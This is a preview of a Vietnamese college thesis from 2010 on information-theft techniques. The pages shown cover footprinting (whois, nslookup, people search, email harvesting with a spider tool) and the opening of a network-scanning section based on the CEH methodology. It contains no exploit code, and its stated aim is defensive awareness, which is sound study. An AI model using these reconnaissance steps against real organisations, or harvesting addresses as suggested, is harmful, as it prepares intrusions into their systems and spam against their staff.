Đề tài Nghiên cứu các kỹ thuật dành cáp thông tin trên mạng

pdf 84 trang yendo 4640
Download
Bạn đang xem 20 trang mẫu của tài liệu "Đề tài Nghiên cứu các kỹ thuật dành cáp thông tin trên mạng", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên

Tài liệu đính kèm:

  • pdfde_tai_nghien_cuu_cac_ky_thuat_danh_cap_thong_tin_tren_mang.pdf

Nội dung text: Đề tài Nghiên cứu các kỹ thuật dành cáp thông tin trên mạng

  1. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung LỜI CẢM ƠN Để hoàn thành chương trình học của hệ Cao Đẳng và làm đề án tốt nghiệp này, chúng em đã nhận được sự hướng dẫn, giúp đỡ và gớp ý kiến nhiệt tình của quý thầy cô Trường Cao Đẳng Nguyễn Tất Thành và Trường Trung Cấp Kinh Tế- Kỹ Thuật Tân Việt. Trước hết, em xin chân thành cảm ơn đến quí thầy cô Trường Trung Cấp Kinh Tế- Kỹ Thuật Tân Việt, đặc biệt là những thầy cô đã tận tình dạy bảo cho chúng em suốt thời gian học tập tại trường. Em xin gửi lời biết ơn sâu sắc đến Thạc Sĩ - Nguyễn Minh Thi. Thầy đã dành rất nhiều thời gian và tâm huyết hướng dẫn nghiên cứu và giúp em hoàn hành đề án tốt nghiệp. Nhân đây, em xin chân thành cảm ơn Ban Giám hiệu Trường Trung Cấp Kinh Tế- Kỹ Thuật Tân Việt cùng quí thầy cô trong Khoa Công Nghệ Thông Tin đã tạo rất nhiều điều kiện để em học tập và hoàn thành tốt khóa học. Đồng thời, em cũng xin cảm ơn quí anh, chị và ban lãnh đạo Công Ty Cổ Phần SX – TM – DV Phúc Nguyên đã tạo điều kiện cho em khảo sát và thực tập qui trình làm việc của hệ thống để viết báo cáo tốt nghiệp và hoàn thành được đề án. Mặc dù em đã có nhiều cố gắng hoàn thiện đề án bằng tất cả sự nhiệt tình và năng lực của mình, tuy nhiên không thể tránh khỏi những thiếu sót. Rất mong được sự đóng góp quí báo của các thầy cô và các bạn. TP. Hồ Chí Minh, tháng 03 năm 2010 Sinh viên thực hiện Vũ Ngọc Thạch Lê Quốc Tung Trang: 1
  2. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung ĐỀ CƯƠNG CHI TIẾT Tên Đề Tài: Nghiên cứu các kỹ thuật đánh cắp thông tin trên mạng. Giáo viên hướng dẫn: Thạc Sĩ - Nguyễn Minh Thi Thời gian thực hiện: Từ ngày 13/01/2010 đến ngày 13/03/2010 Sinh viên thực hiện: Vũ Ngọc Thạch – Lê Quốc Tung Loại Đề Tài: Nghiên cứu Nội dung đề tài: Nghiên cứu các kỹ thuật đánh cắp thông tin trên mạng Tìm hiểu một số thủ thuật khai thác và đưa ra một số thí dụ về thủ thuật đã đưa ra. Kế hoạch thực hiện: Tìm hiểu 1 số thủ thuật truy tìm và đánh cắp thông tin trên mạng. Đưa ra một số ví dụ trong mỗi thủ thuật đó. Cài đặt cấu hình các phần mềm liên quan đến thủ thuật đã đưa ra. Ngày 13 tháng 03 năm 2010 Xác nhận của GVHD Sinh viên thực hiện Vũ Ngọc Thạch Th.S Nguyễn Minh Thi Lê Quốc Tung Trang: 2
  3. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Mục lục Chương 1 MỞ ĐẦU 4 1 GIỚI THIỆU: 4 2 MỤC ĐÍCH: 4 3 ĐỐI TƯỢNG VÀ PHẠM VI ÁP DỤNG: 5 3.1) Đối tượng: 5 3.2) Phạm vi áp dụng: 5 Chương 2 TÌM HIỂU CÁC KỸ THUẬT ĐÁNH CẮP VÀ CÁC BƯỚC THỰC HIỆN 6 4 FOOTPRINTING 6 4.1) Tìm hiểu footpriting 6 4.2) Các bước thực hiện:: 21 5 SCANNING 25 5.1) Giới thiệu về scanning 26 5.2) Bài thực hành sanning 28 6 SYSTEM HACKING 46 6.1) Giới thiệu System Hacking: 46 6.2) Thực hành các bài Lab về System Hacking 47 7 TROJAN và BACKDOOR 61 7.1) Giới thiệu về Trojan và Backdoor: 61 7.2) Các bài thựchành: 61 8 CÁC PHƯƠNG PHÁP SNIFFER 72 8.1) Giới thiệu tổng quan về Sniffer 72 8.2) Hoạt động của sniffer 73 8.3) Tấn công arp 73 8.4) Các bước thực nghiệm: 75 Chương 3 ĐÁNH GIÁ KẾT QUẢ 81 9 ƯU KHUYẾT ĐIỂM: 81 9.1) Ưu điểm: 81 9.2) Khuyết điểm: 81 Chương 4 KẾT LUẬN 82 Chương 5 HƯỚNG PHÁT TRIỂN: 83 9.3) Các sách đã tham khảo trong chương trình này: 84 9.4) Các trang website tham khảo trong chương trình: 84 9.5) Các phần mềm hỗ trợ cho việc viết chương trình: 84 9.6) Hướng dẫn cài đặt chương trình. 84 Trang: 3
  4. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Chương 1 MỞ ĐẦU 1 GIỚI THIỆU: Ngày nay khi ngành công nghệ thông tin đã có một bước phát triển cao đã giúp cho nền công nông nghiệp phát triên lên một bước đáng kể thì việc càng ngày càng nhiều cuộc cạnh tranh giành thị trường và tìm cách đánh đổ đối thủ càng diễn ra hêt sức tinh vi nhờ có ông nghệ thông tin mà cuộc chiến này càng diễn ra một cách khốc liệt hơn bao giờ hết. Đó là chưa kể các người vì lợi ích hay vì muốn chứng to mình mà tìm cách gây tiếng vang bằng cách đánh cắp hoặc phá hoại các lổ hổng bảo mật và chủ đích chính của những kẻ tạo ra loại phần mềm độc hại này. Ai đó đã nói rằng lý do mà hacker viết virus cũng đa dạng, muôn hình muôn trạng như chính bản chất của những gã này. Đó có thể là bực tức về vấn đề gì đó, hay vì viết virus cho vui, hay vì bản chất “lãng mạn”, thích khoe khoang. Ở mức độ “nghiêm túc” hơn thì nguyên nhân có thể vì tiền, chính trị, gián điệp, thi thố tài năng, hoặc để loại trừ đối thủ. Vậy muốn phòng chống ta phải biết cách thức tấn công của chúng và bảo vệ thông tin cho công ty doanh nghiệp và thông tin của ta không bị mất trước hacker ngày càng tinh vi và giảo hoạt, để không bị mất một số tiền đáng kể và số thời gian để khắc phục. 2 MỤC ĐÍCH: - Giảm thiểu khả năng bị đánh cắp dữ liệu cho ta thêm hiểu biết về sự nguy hiểm của các loại mã độc virus. - Nâng cao cảnh giác và luôn luôn cập nhật thông tin nâng cao bảo mật của hệ thống. - Giảm thiểu số nhân lực thời gian chủ chúng ta và của công ty mà vẫn hiệu quả cao trong kinh doanh và trong tiếp thị dứng vững trên thị trường luôn có nhiều đối thủ và cạnh tranh gay gắt. Trang: 4
  5. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung 3 ĐỐI TƯỢNG VÀ PHẠM VI ÁP DỤNG: 3.1) Đối tượng: - Phần nghiên cứu này giúp cho các IT trong các doanh nghiệp hiểu rõ hơn về các tác hại và cách ngăn chặn của những cuộc tấn công mà a có thể bị xãy ra. - Gắn kết tri thức lại với nhau dể chung tay phòng ngừa các hiểm họa luôn dình dập để moi thông tin của bạn. 3.2) Phạm vi áp dụng: - Toàn thể các đối tượng muốn tìm hiểu về bảo mật thông tin nắm bắt rõ hơn các cuộc tấn công trên mạng. Trang: 5
  6. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Chương 2 TÌM HIỂU CÁC KỸ THUẬT ĐÁNH CẮP VÀ CÁC BƯỚC THỰC HIỆN 4 FOOTPRINTING 4.1) Tìm hiểu footpriting Footprinting là kĩ thuật để thu thập thông tin của 1 tổ chức, cơ quan hay 1 cá nhân đảm nhiệm chức vụ nào đó. Footprinting là 1 trong 3 yếu tố cần thiết để phải được làm đầy đủ để thực hiện 1 cuộc tấn công, chẳng hạng 1 tên trộm khi mún vào 1 ngôi nhà nào đó trộm, có nên vào thẳng không. Chắc chắn là không rồi, hắn ta sẽ phải tìm hiểu thử ngôi nhà có những gì, giờ giấc chủ nhà ra sao. Bởi vậy nó cần phải đầy đủ. Khi các bạn cần password “Các bạn có nghĩ rằng password của 1 admin nào đó là ngày sinh, sở thích tên người thân hay địa chỉ nhà không“ ? Đó là lí do tại sao phải thu thập thông tin. Những kẻ tấn công thường phải tốn đến 90% thời gian để thu thập thông tin và chỉ có 10% thời gian cho cuộc tấn công. Các bạn thấy footprinting quan trọng đến cỡ nào rồi chứ. Ví dụ như như 1 tên cướp nhà quyết định sẽ cướp nhà băng thì anh ta sẽ không đi dạo quanh nhà băng và đòi hỏi tiền 1 cách khắt khe. Thay vào đó, anh ta sẽ bắt đầu thu thập thông tin về nhà băng: các xe bọc sắt chở tiền và thời gian của xe đi, các camera đặt trong nhà băng, số nhân viên phục vụ, số nhân viên bảo vệ, cửa để thoát thân và mọi thứ để giúp anh ta thực hiện hoàn hảo phi vụ này. Tương tự cũng như đối với attacker hay hacker. Họ phải khai thác 1 kho tàng thông tin vô giá của đối tượng cho việc tấn công. Và kết quả là attacker thu thập được cả đống thông tin, có thể về 1 tổ chức bí mật nào đó. Vậy FootPrinting thực sự là gì? Trang: 6
  7. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hệ thống thăm dò của một tổ chức tạo điều kiện cho attacker tạo một kho dữ liệu không lồ của 1 tổ chức bí mật. Bằng cách sử dụng 1 số công cụ và công nghệ mới, attacker có thể làm công việc này một cách khá dễ dàng. Có nhiều môi trường làm việc khác nhau như: Internet, Intranet Mỗi thứ lại có 1 cách thăm dò và đối tượng khác nhau. Có phải FootPrinting thật sự cần thiết? Rất cần thiết. Nó cho bạn nhiều thứ. Thông tin quan trọng để làm các bước sau này. Như vậy bạn đã phần nào hiểu về FootPrinting. Có nhiều cách đề làm việc này như Ping, Whois và hãy tận dụng các máy chủ tìm kiếm nó đem lại cho bạn nhiều thứ hơn bạn nghĩ đó. Đây chỉ là một trong những bước mà một attacker hay hacker phải làm. Về Domain hãy chú ý đến DNS, có được nó, có khi bạn chẳng làm gì mà có thể kiểm soát cả Server Nội dung cần thực hiện được sau trong Module này. a) Các bước thực hiện footprinting: - (Overview of the reconnaissance phase) Quan sát tổng quan về việc trinh sát. - (FootPrinting: an introduction) Giới thiệu kỹ thuât in dấu chân. - Information gathering methodology of hacker: Các phương pháp thu thập thông tin của hacker. - Competitive intelligence gathering (chiến lược cạnh tranh thông minh trong việc thu thập thông tin). - Tool that aid in footprinting (các tool hỗ trợ trong việc thực hiện kỹ thuật in dấu chân). - Tootprinting steps (các bước thực hiện trong kỹ thuật in dấu chân). - Kết quả của sau khi thực hiện footprinting là những thông tin khác chi tiết và cụ thể về 1 tổ chức. Có nhiều môi trường để thu thập thông tin như Internet, Intranet, Extranet, Wireless và cả những hệ thống phức tạp khác. Trang: 7
  8. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung b) Areas and information which attacker seek Môi trường để footprinting, và môi trường nào nên thu thập cái gì? Xem hình dưới đây để biết “cái nào thì thu thập cái gì“ nha. Môi trường nào có những điểm nào cần để bạn khai thác. Hình1: Sơ đồ thông tin cần thu thập trong một môi trường Internet: Một hệ thống mạng máy tính được liên kết với nhau trên toàn cầu, để trao đổi dữ liệu với nhau. Bạn đang sử dụng mạng internet để đọc bài này đó. Hình dưới là mô hình mạng internet: Trang: 8
  9. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 2: Mô hình mạng internet Intranet: Mạng nội bộ, Mạng này có thể nằm trong công ty, hoặc 2 công ty gần nhau. Hình 3: Mô hình mạng intranet Trang: 9
  10. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Extranet: . Connection origination and destination: Kết nối từ đâu tới mục tiêu (target). . Type of connection: các loại kết nối mạng như mạng LAN (Local Area Network: mạng nội bộ) hay WAN (Wide Area Network: mạng diện rộng), VPN hay PPPoE. . Access Control Mechanism Hình 4: Mô hình mạng extranet Wireless: Mạng không dây, nói mạng không dây chắc các bạn cũng hình dung được mạng này không cần dây cáp vẫn có thể truyền tín hiệu, dữ liệu cho nhau. Liệt kê các quyền trong hệ thống (User hay group name, system banner, routing table, giao thức quản lí mạng đơn giản SNMP) Remote access Analog/digital telephone numbers: Sử dụng các phương tiện kĩ thuật số trong viêc thu thập thông tin là 1 điều rất quan trong. Remote system type: các loại hệ thống từ xa. Trang: 10
  11. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Authentication mechanism: Các định để có tính an ninh, bạn cứ nghĩ đơn giản khi bước qua cổng để lên máy bay bạn được máy scan xem trong người có vũ khi hay không, thì ở đây cũng thế, phải có hệ thống xác định tính bảo mật trước khi thực thi gì. c) ACLs (Access Control List) Danh sách chứa thông tin vê người dùng, quá trình hay đối tượng có thể truy cập vào tập tin hay đối tượng đó. d) Hệ thông phát hiện xâm nhập (Intrusion Detection System): Firewall chẳng hạn Hình 5: mô hình hệ thống Firewall e) Information gathering Phương pháp thu thập thông tin: Unearth initial information: thu thập, khai thác, tìm kiếm những thông tin gốc, nói vậy có lẽ các bạn khó hình dung. Các bạn hãy tưởng tượng khi 1 xảy ra 1 vụ trộm, công an sẽ điều tra như thế nào. Trước tiên là Trang: 11
  12. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung xem thử đường nào để đột nhập vào nhà, sau đó mới điều tra làm cách nào để đột nhập. Ở đây thu thập thông tin cũng thế, khi bạn muốn biết 1 thông tin gì đó bạn phải tìm kiếm xem thông tin nào là gần nhất, liên quan nhất tới mục tiêu. Chẳng hạn bạn muốn tấn công 1 domain www. uitstudent. com bạn phải xem website này thuộc về 1 tổ chức nào đó. Từ đó mới bắt đầu khoanh vùng tìm đối tượng tin tức muốn thu thập Locate Network Range các định các thông số mạng đây. DNS, IP Ascertain Active Machines: điều này quan trọng đây, ví dụ trang www. uitstudent. com nha, bạn cần phải biết máy chủ của website này là ở đâu. Heheheh. Biết rồi làm gì thì hồi sau sẽ rõ, cứ từ từ tiếp thu nha. Discover Open Port/Access Point: mở port moderm hoặc Access Point. ICT sẽ nói sơ định nghĩa port và tại sao lại mở hoặc đóng nó. Máy tính của chúng ta hiện nay có khả năng chạy nhiều nhiệm vụ, dịch vụ cùng 1 lúc cho nên để phân biệt các dịch vụ người ta gán cho nó 1 con số, số đó gọi là port đó. Giống như việc bạn mở port để download trên torrent. Detect Operating System: cái này chắc ai cũng biết, xác định HDH nha. Uncover Service on Port: như đã nói trên việc mở port để chạy thêm các dịch vụ nhanh hơn. Map the metwork ở địa chỉ IP, lấy thông tin từ máy này qua máy khác Hình dưới là bản đồ mạng: Trang: 12
  13. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 6: bảng đồ mạng f) Unearth intitial information Hack tool: Sử dụng các tool để tìm kiếm thông tin. Thường thỉ để tìm kiếm thông tin về 1 domain nào đó ít sử dụng tool. Hình dưới là tool đây: Trang: 13
  14. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 7:Phần mềm spade menu bascis Hình 8:Phần mềm spade menu tools Samspade: Bạn thử vào http: //samspade. org/ và gõ www. download. com nha. g) Commonly Include: Nên nhớ 1 điều đã thu thập thông tin thì phải thu thập hết, kể cả những thông tin bình thường nhất. Như ảnh trên bạn đã thấy rồi đó, email liên lạc, hay địa chỉ của người đăng kí domain. h) Information Source: Sử dụng khả năng tìm kiếm của Whois, hay dùng lệnh nslookup để chuẩn đoán DNS Server. Đối với whois, ICT không cần nói, vì bạn hãy thử vào www. whois. com và gõ 1 địa chỉ nào mình muốn, bất cứ địa chỉ nào. Hãy xem kết quả. Bây giờ đề cập 1 xíu đến nslookup nha. i) Nslookup: Là 1 lệnh có cả ở HDH Unix và Windows nhưng trong này ICT chỉ đề cập đến HDH Windows. Đầu tiên bạn nên hiểu 1 xíu về nó nha, lệnh này để thừa nhận rằng Trang: 14
  15. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung bạn đang truy vấn một miền cục bộ trên mạng riêng của mình. Ví dụ mình gõ lệnh nslookup www. vnn. vn, đây là 1 tên miền bên ngoài, sau khi thực hiện nó sẽ trả về lệnh như hình dưới nha. (Asked whois. markmonitor. com: 43 about download. com) MarkMonitor is the Global Leader in Enterprise Brand Protection. Domain Management MarkMonitor Brand Protection AntiFraud Solutions Corporate Consulting Services Visit MarkMonitor at www. markmonitor. com Contact us at 1 800 745 9229 In Europe at 44 (0) 20 7840 1300 The Data in MarkMonitor. com WHOIS database is provided by MarkMonitor. com for information purposes and to assist persons in obtaining information about or related to a domain name registration record. MarkMonitor. com does not guarantee its accuracy. By submitting a WHOIS query you agree that you will use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow enable or otherwise support the transmission of mass unsolicited commercial advertising or solicitations via e-mail (spam) ; or (2) enable high volume automated electronic processes that apply to MarkMonitor. com (or its systems). MarkMonitor. com reserves the right to modify these terms at any time. By submitting this query you agree to abide by this policy. Registrant: Domain Admin CBS Interactive Inc. 235 Second Street San Francisco CA 94105 US hostmaster@cnet. com 1. 4153442000 Fax: 1. 4153442000 Domain Name: download. com Registrar Name: Markmonitor. com Registrar Whois: whois. markmonitor. com Registrar Homepage: http: //www. markmonitor. com Administrative Contact: Domain Admin CBS Interactive Inc. 235 Second Street San Francisco CA 94105 Trang: 15
  16. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung US hostmaster@cnet. com 1. 4153442000 Fax: 1. 4153442000 Technical Contact Zone Contact: Domain Admin CBS Interactive Inc. 235 Second Street San Francisco CA 94105 US hostmaster@cnet. com 1. 4153442000 Fax: 1. 4153442000 Created on : 1996-02-24. Expires on : 2013-02-24. Record last updated on : 2010-02-17. Domain servers in listed order: ns3. cnet. com ns. cnet. com ns2. cnet. com MarkMonitor is the Global Leader in Enterprise Brand Protection. Domain Management MarkMonitor Brand Protection AntiFraud Solutions Corporate Consulting Services Visit MarkMonitor at www. markmonitor. com Contact us at 1 800 745 9229 In Europe at 44 (0) 20 7840 1300 (Asked whois. crsnic. net: 43 about =download. com) (show) Whois Server Version 2. 0 Domain names in the. com and. net domains can now be registered with many different competing registrars. Go to http: //www. internic. net for detailed information. Server Name: DOWNLOAD. COM. MORE. INFO. AT. WWW. BEYONDWHOIS. COM IP Address: 203. 36. 226. 2 Registrar: TUCOWS INC. Whois Server: whois. tucows. com Referral URL: http: //domainhelp. opensrs. net Domain Name: DOWNLOAD. COM Registrar: MARKMONITOR INC. Whois Server: whois. markmonitor. com Referral URL: http: //www. markmonitor. com Name Server: NS. CNET. COM Trang: 16
  17. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Name Server: NS2. CNET. COM Name Server: NS3. CNET. COM Status: clientDeleteProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Status: serverDeleteProhibited Status: serverTransferProhibited Status: serverUpdateProhibited Updated Date: 18-nov-2008 Creation Date: 24-feb-1996 Expiration Date: 25-feb-2013 >>> Last update of whois database: Tue 09 Mar 2010 01: 50: 11 UTC <<< NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' (“VeriSign “) Whois database is provided by VeriSign for information purposes only and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow enable or otherwise support the transmission of mass unsolicited commercial advertising or solicitations via e-mail telephone or facsimile; or (2) enable high volume automated electronic processes that apply to VeriSign (or its computer systems). The compilation repackaging dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY. COM. NET. EDU domains and Trang: 17
  18. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 9: Truy vấn bị lỗi khi liên kết ra NDS khác Nếu nhìn vào hình trên, bạn sẽ thấy được rằng có một thông báo lỗi miền non- authoritative cho các địa chỉ IP là 203. 162. 0. 36 và 203. 162. 168. 130. Điều này có nghĩa rằng máy chủ DNS của mình đã cố gắng truy vấn một máy chủ DNS bên ngoài để xem địa chỉ IP được kết hợp với miền www. vnn. vn. Nói tóm lại lệnh nslookup sẽ cung cấp thông tin để bạn chuẩn đoán máy chủ DNS. (giống bác sĩ chuẩn đoán bệnh nhân vậy). j) Finding a company’s url Hãy tìm kiếm địa chỉ website 1 công ty bằng cách sử dụng các lệnh tìm kiếm trên các bộ máy tìm kiếm như Google, Cuil Nếu không biết địa chỉ website thì tìm kiếm tên của công ty (điều này đơn giản phải k). Google có thể nói là 1 bộ máy tìm kiếm với số lượng cực lớn thông tin. Hãy tìm kiếm thử 1 vài diễn đàn, blog cá nhân để tìm kiếm 1 thông tin nóng, hay nhạy cảm gì đó thử xem. Biết đâu đó là thông tin quan trọng thì sao. k) Google search company’s info. Google thì đã quá quen thuộc với các bạn rồi, có thể tìm kiếm bất cứ thứ gì trên bộ máy tìm kiếm này nha. Trang: 18
  19. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 10: Giao diện trang tìm kiếm google l) Internal url Dưới đây là 1 vài website nội bộ để bạn tìm kiếm thông tin (mình đã vào thử nhưng đều trỏ tới www. xsecurity. com). Hình 11: một số trang tìm kiếm khác m) Extracting archive of a website Trang: 19
  20. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Bạn có thể tìm được hầu hết các thông tin của các cơ quan, tổ chức tại địa chỉ www. archive. org. Nào hãy bắt đầu gõ địa chỉ đi, chần chừ gì nữa. Tại đây bạn có thể tìm kiếm khá nhiều thứ, từ dữ liệu của người lao động, kết quả của 1 hoạt động nào đó. v. v. rất nhiều và rất nhiều, có tới 85 tỉ trang trong dữ liệu của archive. Bắt đầu thử 1 tí nha, truy cập vào trang www. archive. org và gõ www. vnn. vn như hình dưới : Hình 12: giao diện trang tìm kiếm thông tin archive n) People search Hãy thử vào http: //people. yahoo. com hay http: //www. intellius. com để tìm kiếm thử tên 1 người hay số điện thoại nào đó. Trang: 20
  21. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 13: Giao diện trang tìm kiếm people o) Vài trang khác để tìm kiếm: Đó Thêm 1 vài trang tìm kiếm cá nhân cho các bạn tham khảo: 1. http: //www. switchboard. com/ 2. http: //www. i2. co. uk/anacubis/ 3. http: //finance. google. com/finance p) Competitive intelligence gathering Phần này sẽ chỉ cho các bạn cách dùng những từ khóa nào để tìm kiếm, có thể chỉ có bạn kiếm được mà người khác sẽ không kiêm được. 4.2) Các bước thực hiện:: a) Tìm hiểu thông tin về domain: Ta vào trang web www. whois. net de tìm thông tin và đánh vào trang web minh cần tìm. Trang: 21
  22. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình14: trang web tìm kiếm thông tin www. whois. net Hình15: Gõ địa chỉ trang web cấn tìm kiếm thông tin Trang: 22
  23. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình16: Ttrang web www. whois. net trả về thông tin Ngoài việc tìm hiểu thông tin domain như trên chúng ta có thể sư dụng các tiện ích như reverse ip domain lookup để có thể xem thử trên IP của mình có bao nhiêu host chung với mình. Vào link sau đê sử dụng tiện ích này: http: //www. domaintools. com/reverse-ip/ Trang: 23
  24. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 17: kiểm tra có bao nhiêu Ip chung host với mình Tìm kiếm thông tin này rất cần thiết với hacker, bởi vì dựa vào thông tin sử dụng chung server, hacker có thể thông qua các website bị lỗi trong danh sách trên và tấn công vào server từ đó kiểm soát tất cả các website dược hosting trên server. b) Bài thực hành tìm kiếm thông tin mail Trong bài này ta sư dụng phần mềm “1st email address spider “ để tìm kiếm thông tin về các email. Hacker có thể sử dụng phần mềm này để thu thập thêm thông tin về mail, hay lọc ra các đối tượng email khác nhau, tuy nhiên các bạn có thể sử dụng tool này để thu thập thêm thông tin nhằm mục đích marketing. Ví dụ bạn cần tìm thông tin của các email có đuôi là @vnn. vn hay @hcm. vnn để phục vụ cho việc markerting sản phẩm. Ta có thể cấu hình việc sử dụng trang web nào để lấy thông tin, trong đây tôi sử dụng trang google để tìm kiếm thông tin Hinh18:Llựa chọn website tìm kiếm thộng tin Trang: 24
  25. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình19: Nhập thông tin cần tìm kiếm và được trả về danh sách thông tin 5 SCANNING Sau khi nghiên cứu xong module này bạn sẽ có thể biết được: Trích: . Definition of scanning . Types of objectives of scanning . Understanding CEH Scanning . Checking live system and open port . Understanding scanning techniques . Different tool present to perform Scanning . Understanding banner grabbing and OS fingerprinting . Drawing network diagram of vulnerable hosts . Preparing Proxies . Understanding anonymizers . Scanning countermeasures Trang: 25
  26. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Mình để nguyên tên tiếng Anh, nghiên cứu từng phần thì bạn sẽ hiểu được phần nào nói gì, dịch những từ có thể mất đi thuật ngữ IT. 5.1) Giới thiệu về scanning a) Scanning - definition Scanning là 1 trong 3 kĩ thuật thu thập thông tin của 1 attacker. Kĩ thuật đầu tiên các bạn được học là Footprinting -Qua việc Scanning, attacker có thể tìm kiếm được. . Địa chỉ IP (nếu attacker biết được IP có thể tìm ra vị trí của bạn) . Hệ điều hành (Linux/Unix;Windows;Ubuntu ) . Cấu trúc hệ thống (biết được cấu trúc hệ thống cũng là 1 thông tin quan trọng trong việc xâm nhập. . Các chương trình, dịch vụ nào đang chạy trên máy tính. Vậy thì làm sao để có được những thông tin trên. Có 3 cách scan mà chúng ta cần quan tâm. b) Type of scanning Post scanning: Quá trình thực hiện kết nối tới cổng TCP và UDP của hệ thống mục tiêu nhằm xác định dịch vụ nào của hệ thống mục tiêu đang ở trạng thái chạy. Việc xác định các cổng đang ở trạng thái chạy nhằm mục đích phân tích và xác định các ứng dụng đang chạy của hệ thống và kiểu của hệ thống. Các cổng dịch vụ đang trong trạng thái chạy có thể cho phép một user không hợp pháp nào đó truy nhập vào hệ thống khi mà hệ thống đó chưa được cấu hình tốt hoặc sử dụng phiên bản phần mềm có độ bảo mật kém. Trang: 26
  27. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Network scanning: Scan để xác định các host đang hoạt động trên 1 mạng, có thể vì mục đích tấn công, cũng có thể mục đích bảo mật, phòng thủ. Vulnerable scanning: Scan các lổ hổng trong bảo mật để từ đó có thể khai thác. 1 công cụ để scan lỗi đã có trong forum UITS là Acunetix Web Vulnerability Scanner c) Objective of scanning Bạn cần quan tâm những gì trong kĩ thuật scanning: . Phát hiện đựoc hệ thống nào đang hoạt động trong hệ thống mạng. . Biết đươc port nào đã và đang chạy . . Biết được hệ điều hành nào đang chạy trên hệ thống mục tiêu. . Biết được những dịch vụ nào đang chạy trong hệ thống. . Địa chỉ IP của hệ thống d) Ceh scanning methodology Phương pháp hay định hướng trong việc tấn công sẽ theo trình tự sau, xem sơ đồ: Check forr live system: Kiểm tra thử hệ thống còn “sống “ hay không, còn hoạt động tốt hay không Check for open port: Kiểm tra xem thử hệ thống có mở port không. Identify service: Kiểm tra, nhận dạng xem có dịch vụ nào đang chạy hay không. Banner Grabbing/OS Fingerprinting: Kỹ thuật lấy thông tin về phiên bản HDH của 1 hệ thống mục tiêu. Scan for Vulnerable: Trang: 27
  28. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Scan lỗi website để khai thác. Draw Network Diagram of Vulnerable host: Dựng biểu đồ hệ thống mạng sau khi đã phát hiện được lỗi các host. Prepare Proxies: Ẩn mình đây mà, chuẩn bị công kích. Attack e) Checking for Live Systems-ICMP Scanning Một kĩ thuật scanning đây, đó là ICMP Scanning. Xác định hệ thống còn “sống “hay không là 1 điều quan trọng đúng k, nếu biết hệ thống đó đã “chết “thì hacker sẽ ngừng ngay cuộc tấn công của mình (chết rồi thì có ai đánh nữa không). 5.2) Bài thực hành sanning a) Tool Angry IP Scanner (công cụ kiểm tra host ip) Xin giới thiệu các bạn 1 tool dùng để xác định xem host còn sống hay chết. Tool Angry IP Scanner. Các bạn download tool này tại đây. Thử ping tới IP 68. 178. 254. 133 xem: Trang: 28
